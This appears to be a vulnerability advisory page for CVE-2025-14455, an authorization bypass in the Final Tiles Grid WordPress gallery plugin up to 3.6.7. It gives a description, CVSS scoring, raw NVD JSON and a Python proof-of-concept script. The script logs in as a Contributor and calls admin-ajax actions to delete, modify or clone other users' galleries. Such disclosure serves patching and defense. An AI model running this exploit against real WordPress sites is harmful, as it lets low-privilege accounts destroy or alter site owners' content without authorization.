Security Vulnerability Report
中文
CVE-2025-14455 CVSS 5.4 MEDIUM

CVE-2025-14455

Published: 2025-12-19 10:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.7. This is due to the plugin not properly verifying that a user is authorized to perform actions on gallery management functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete, modify, or clone galleries created by any user, including administrators.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Image Photo Gallery Final Tiles Grid plugin <= 3.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14455 PoC - WordPress Final Tiles Grid Authorization Bypass # Target: Image Photo Gallery Final Tiles Grid plugin <= 3.6.7 def exploit_authorization_bypass(target_url, username, password, gallery_id, action='delete'): """ Exploit authorization bypass in Final Tiles Grid plugin. Args: target_url: WordPress site URL username: Contributor+ level username password: Password gallery_id: ID of gallery to target action: 'delete', 'modify', or 'clone' """ session = requests.Session() # WordPress login login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url, 'testcookie': '1' } session.post(login_url, data=login_data) # Define action mappings action_map = { 'delete': 'ftgg_delete_gallery', 'modify': 'ftgg_update_gallery', 'clone': 'ftgg_clone_gallery' } ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Exploit authorization bypass exploit_data = { 'action': action_map.get(action, 'ftgg_delete_gallery'), 'gallery_id': gallery_id } response = session.post(ajax_url, data=exploit_data) return response if __name__ == '__main__': if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <gallery_id>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] gid = sys.argv[4] result = exploit_authorization_bypass(target, user, pwd, gid) print(f"Status: {result.status_code}") print(f"Response: {result.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14455", "sourceIdentifier": "[email protected]", "published": "2025-12-19T10:15:48.017", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.7. This is due to the plugin not properly verifying that a user is authorized to perform actions on gallery management functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete, modify, or clone galleries created by any user, including administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L213", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L528", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L684", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3417363/final-tiles-grid-gallery-lite/trunk/FinalTilesGalleryLite.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/830663b6-0786-48c7-9ffd-ac3ba2bd3e0c?source=cve", "source": "[email protected]"}]}}